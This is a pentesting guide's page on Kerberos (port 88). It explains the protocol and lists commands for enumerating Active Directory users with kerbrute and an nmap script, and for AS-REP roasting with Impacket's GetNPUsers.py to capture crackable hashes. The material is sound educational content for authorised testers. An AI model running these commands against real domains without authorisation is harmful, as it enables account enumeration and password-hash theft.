The Pentesting Guide
TwitterBlog
  • The Pentesting Guide
  • ℹ️0 - Pre-Engagement
  • 🔍1 - Information Gathering
  • Passive (OSINT)
  • Active
    • 🕵️HUMINT
    • WIFI
    • IP & Port Scanning
    • Services
      • 21 - FTP
      • 22 - SSH
      • 25 - SMTP
      • 53 - DNS
      • 80,443 - WEB
      • 88 - Kerberos
      • 110 - POP3
      • 111 - rpcbind
      • 161 - SNMP
      • 389 - LDAP
      • 139,445 - SMB
      • Active Directory
  • 💣2 - Exploitation
  • Brute Forcing
  • WEB
    • Apache Tomcat
    • Authentication
    • Broken Access Control
    • Cache poisoning
    • Clickjacking
    • CORS
    • CSRF
    • File Inclusion
    • Host Header Injection
    • HTTP Request Smuggling
    • Information disclosure
    • JWT
    • OS command injection
    • PHP deserialisation
    • SQLi
    • SSRF
    • SSTI
    • Shellshock
    • Unrestricted File Upload
    • XSS
    • XXE
  • Web (OWASP Test cases)
    • 4.1 Information Gathering
    • 4.2 Configuration and Deployment Management Testing
    • 4.3 Identity Management Testing
    • 4.4 Authentication Testing
    • 4.5 Authorization Testing
    • 4.6 Session Management Testing
    • 4.7 Input Validation Testing
    • 4.8 Testing for Error Handling
    • 4.9 Testing for Weak Cryptography
    • 4.10 Business Logic Testing
    • 4.11 Client-side Testing
    • 4.12 API Testing
  • WIFI
  • HUMINT
    • 🎣Gophish (Phishing)
    • Malicious Phishing Files
    • Phishing Evaluation
  • BoF - Windows(x86)
  • Active Directory
    • Kerberos
    • GPOs
    • Certificates
    • LAPS
    • Domain Trusts
  • 👿3 - Post Exploitation
  • File transfer
  • Shells
  • Situational Awareness
    • Containers and VMs
    • Linux
    • Windows
      • Dumping Credentials
      • Countermeasure Evasion
    • Active Directory
      • BloodHound & SharpHound
  • General
    • Linux
    • Windows
  • Local Privilege Escalation
    • Linux
    • Windows
  • Persistance
    • Windows
  • Cracking
  • Pivoting
    • Tunnelling & Port Forwarding
  • Lateral Movement
  • WIFI
  • 📓4 - Report
  • 🧹5 - House cleaning
Powered by GitBook
On this page
  • Introduction
  • Obtain domain users
  • AS-REProasting attack
  • References
  1. Active
  2. Services

88 - Kerberos

Last updated 2 years ago

Introduction

Port: 88

Kerberos is a computer network security protocol, used in Active Directory, that provides mutual authentication for trusted users and servers across an untrusted network. Nonetheless, it does not validate which resources or services users can access, making each service responsible for checking the users' permissions.

As a method of authentication, users request tickets to the Kerberos service for accessing services existing outside the context of the Kerberos service itself. These tickets contain information identifying the user who requested the ticket. Tickets are encrypted with the password of the service account.

Finally, attackers can escalate privileges or perform lateral movements on the network by compromising these tickets.

Obtain domain users

An attacker can enumerate users on an Active Directory network with Kerberos. Nevertheless, the attacker can also use other services like SMB to obtain them.

kerbrute userenum --dc <IP_DC> -d <DOMAIN> <USERS_WORDLIST> sudo nmap -p 88 --script=krb5-enum-users --script-args "krb5-enumusers.realm='<domain>'",["userdb=<USERNAMES.TXT>"] <IP>

AS-REProasting attack

A pentester can perform AS-REP Roasting to know which user accounts do not require preauthentication.

GetNPUsers.py <domain_name>/ -usersfile <USERNAME.txt> -format {hashcat | john} -outputfile <output_AS_REP_responses_file> -dc-ip <DC_IP>

References

Explain like I’m 5: Kerberos